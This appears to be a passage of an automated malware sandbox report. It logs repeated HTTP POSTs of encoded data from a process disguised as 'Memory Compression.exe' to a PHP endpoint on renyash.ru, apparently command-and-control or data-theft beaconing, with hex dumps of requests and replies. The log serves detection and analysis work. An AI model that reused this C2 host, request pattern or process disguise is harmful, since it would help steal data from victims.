                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 27 5c 23 2e 0f 08 20 3b 25 0f 3d 08 2f 5e 24 20 03 1f 3e 22 26 13 31 5d 24 10 2e 01 20 51 23 29 34 5a 33 3d 32 06 27 2e 22 56 28 11 2c 5d 00 10 23 40 33 0d 2d 5a 39 21 2d 56 3e 31 20 40 37 2f 27 5a 33 06 3e 1d 37 23 30 03 23 2d 3a 03 2c 57 3c 08 2d 24 0f 01 2d 2b 30 58 34 1f 2b 55 00 14 20 57 26 5f 34 5e 3d 23 23 0e 34 06 00 59 27 15 28 54 2a 3c 0e 54 29 5e 2a 0d 28 3c 2e 1a 37 01 3e 02 29 0d 3c 0a 30 0c 31 1b 32 3c 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98'\#. ;%=/^$ >"&1]$. Q#)4Z3=2'."V(,]#@3-Z9!-V>1 @7/'Z3>7#0#-:,W<-$-+0X4+U W&_4^=##4Y'(T*<T)^*(<.7>)<012<!_#.T?WT0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                76192.168.2.550058104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:32.429603100 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:32.783674002 CET1060OUTData Raw: 5f 54 5d 5d 5f 52 5d 50 5c 5f 50 57 54 5d 59 5b 59 50 5b 59 57 52 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _T]]_R]P\_PWT]Y[YP[YWRTY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!]&#(]>"_#6'&'>_>+;W4"'<!(&76$>.^''P*
                                                                                                                                Jan 11, 2025 15:03:32.901945114 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:33.077414989 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:33 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wVuU67wJfXPEwi%2BLZhl%2B3PZDfIcz1Q2LBaYMSelyhZHh7I2tW%2FDNzbN%2F9MBGB2Muuh1ibI55Knq4yrb88YHer63zNn23i1%2BKBhSvk0ceqO960NtPiAJGmjN2djUWBBrYKNgEReHb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005736a5a055e6c-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=6664&min_rtt=1754&rtt_var=10478&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=35576&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                77192.168.2.550059104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:33.206417084 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:33.592622995 CET1060OUTData Raw: 5a 54 58 5e 5a 5f 58 5d 5c 5f 50 57 54 54 59 5c 59 5c 5b 50 57 51 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZTX^Z_X]\_PWTTY\Y\[PWQT[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!\&'<$Z72>'C,Y>*>=$W499$/2<%7Y"4#S*;.^''P*!
                                                                                                                                Jan 11, 2025 15:03:33.660840034 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:33.917629957 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:33 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AeGw3wmH%2FaMURnt4iDQ2tm8%2FF43f2jvl2jQA5P08kQHVze2YLo%2BDduXAGIK417NpMwXgfvQwofWqefysbxIK3UO%2FM1K6zvMn6EeA6DqpP1W7Ha2oLAZrjs5GnM65Gw9zF90qX0L9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005736f1aed43a4-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3343&min_rtt=1940&rtt_var=3535&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=110849&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                78192.168.2.550060104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:34.053479910 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:34.408143044 CET1060OUTData Raw: 5f 54 5d 59 5a 59 5d 57 5c 5f 50 57 54 52 59 52 59 53 5b 58 57 55 54 50 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _T]YZY]W\_PWTRYRYS[XWUTP[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!]2#?"<42!$?92)]##9"'?%+6/";);.^''P*
                                                                                                                                Jan 11, 2025 15:03:34.505661964 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:34.777825117 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:34 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ll4297s%2BCEv1s5MSLm6F8ZkTFjmOWANPv4SH5NGRYg7V9vaJTTYlOH5FtwyjA3d8A1Pg%2FNewZHuiy3iWk%2FHL60weSZCUk9VDmt7HqDDT7gdT0ZJyHrboZZLWzk82pZKqDmazutjA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573746e350f5d-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2731&min_rtt=1489&rtt_var=3042&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=127789&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                79192.168.2.550061104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:34.925643921 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:35.283231020 CET1060OUTData Raw: 5f 5f 5d 59 5a 58 58 51 5c 5f 50 57 54 54 59 58 59 5d 5b 51 57 50 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: __]YZXXQ\_PWTTYXY][QWPT][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!^%<24!*350*:!=;3#*9$!<&;"'W*.^''P*!
                                                                                                                                Jan 11, 2025 15:03:35.397833109 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:35.562206030 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:35 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qKFzItxlI2M%2FJqPf5ULlEa%2BZ2pVytJeEsXSTDQWNu6j70RCbGpzTzp1PLg1Gqbq%2BI0zasohIjOHa6lDKo%2FsuFjORQBJpd%2FolLScxJvFtq5SCCdh9aiKtawoArsHWBjHjz4RP7KhU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057379fa724205-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3338&min_rtt=1837&rtt_var=3691&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=105445&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                80192.168.2.550062104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:35.696679115 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1056
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:36.048978090 CET1056OUTData Raw: 5a 53 5d 55 5f 59 58 50 5c 5f 50 57 54 55 59 5c 59 5d 5b 5d 57 53 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZS]U_YXP\_PWTUY\Y][]WST][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!% <<7*Z$5 ]*%^=88Q!)3?"S*&,54+S=;.^''P*
                                                                                                                                Jan 11, 2025 15:03:36.141376972 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:36.392874002 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:36 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a7nibPEZikGEl0BKdAU7WNyu8tp9l2rDjhsmaIHXOussP2iTGBSYg10SXYu63IDiGfzcN1wMmj03Pupb5jjOCys3J417%2BUt8dF5REGdJ6eMqfstMbmZeleYjfYpL%2BYCowEa%2B5LYd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005737e9a7f8c96-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3591&min_rtt=1959&rtt_var=3999&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1366&delivery_rate=97229&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                81192.168.2.550063104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:36.623451948 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:36.970695972 CET1060OUTData Raw: 5f 57 5d 58 5f 52 58 57 5c 5f 50 57 54 5c 59 5a 59 54 5b 5f 57 5f 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _W]X_RXW\_PWT\YZYT[_W_T][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!2,X(1?#1:'$_*1\*$#9&3&T?&!7/*.^''P*
                                                                                                                                Jan 11, 2025 15:03:37.077056885 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:37.312779903 CET813INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:37 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zs7jzyw8Xwut9BjDTQaQyOtuPq%2B81g31lo5orDF%2FBZY9sWm%2BcgUO4GrbHERYBY2%2F%2BfK7g%2B%2FS95a12%2FlRFgnGmla0HBtDVUJdQIPy%2F19UwPEp2CtcwOQpdc7iF1r4fbUy2PdFxRwg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573847f385e6c-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3686&min_rtt=1596&rtt_var=4779&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=79689&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                82192.168.2.550064104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:37.445121050 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1056
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:37.798958063 CET1056OUTData Raw: 5f 53 5d 5c 5a 5f 5d 56 5c 5f 50 57 54 55 59 5d 59 51 5b 5d 57 50 54 5f 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _S]\Z_]V\_PWTUY]YQ[]WPT_[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"&+'#5$%3=)%]=8,V4).3=+'6;U=+.^''P*=
                                                                                                                                Jan 11, 2025 15:03:37.917110920 CET25INHTTP/1.1 100 Continue


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                83192.168.2.550065104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:37.962038040 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1776
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:38.314516068 CET1776OUTData Raw: 5f 51 5d 5d 5f 5c 5d 50 5c 5f 50 57 54 50 59 5d 59 57 5b 58 57 51 54 5f 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _Q]]_\]P\_PWTPY]YW[XWQT_[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!]%$>2 "*_$)_)[>;V#*S'/>T?&;5<*;.^''P*1
                                                                                                                                Jan 11, 2025 15:03:38.424504995 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:38.672864914 CET950INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:38 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lVhWgpqxL6sqHArrvrnHqBXfBXBXKWFdjvsZpSTxO58RWW0rZV87nVMuMO51Thy%2FgBdmckvOt8chNKSGy0mJUwn%2BsWSForq798n84ZGyU9nFNjSTfdWuqLlxaaUNIZm%2Bjg6poEwR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005738cd9c418c0-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3370&min_rtt=1481&rtt_var=4333&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2086&delivery_rate=87983&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 24 04 21 3e 07 09 35 3b 32 1f 29 22 38 03 24 0e 2e 03 2a 0c 0c 58 25 3b 09 05 2d 5e 2c 51 35 04 2c 5d 30 2e 39 1b 33 00 32 56 3f 11 2c 5d 00 10 23 40 24 23 3a 02 2e 1c 03 54 3e 1f 20 42 22 2f 27 5e 24 16 26 57 23 30 3b 5f 20 2d 3e 03 38 1f 28 09 2d 37 26 5f 3a 28 0a 1e 22 35 2b 55 00 14 20 56 25 2a 2b 02 2a 23 30 57 20 5e 2d 04 30 05 30 53 3d 02 3c 1c 3d 28 08 0b 3c 2c 22 53 21 3c 21 10 3e 0a 20 40 24 0c 31 50 26 16 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98$!>5;2)"8$.*X%;-^,Q5,]0.932V?,]#@$#:.T> B"/'^$&W#0;_ ->8(-7&_:("5+U V%*+*#0W ^-00S=<=(<,"S!<!> @$1P&!_#.T?WT0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                84192.168.2.550066104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:38.105557919 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:38.454988956 CET1060OUTData Raw: 5f 54 58 58 5f 53 58 57 5c 5f 50 57 54 53 59 5b 59 52 5b 50 57 53 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _TXX_SXW\_PWTSY[YR[PWST[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"' ](2<!2!35$X?9_)8U7:%'<-(6Z!4(*;.^''P*=
                                                                                                                                Jan 11, 2025 15:03:38.559602976 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:38.725240946 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:38 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tW2eg86niXS4pg%2BBqJsHgCUZMDUmm%2B91Avh5QF65TDzu6QL9n%2BYU1BZtrcf8kTLa8AQVMRT43237ASxKT8hX%2BRf3dvqTOskP96YlcfkydokGB6Mt10g4zmQqa1fFmtShOOCWkCai"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005738dbb6a428f-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4204&min_rtt=1871&rtt_var=5369&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=71080&cwnd=99&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                85192.168.2.550067104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:39.065620899 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
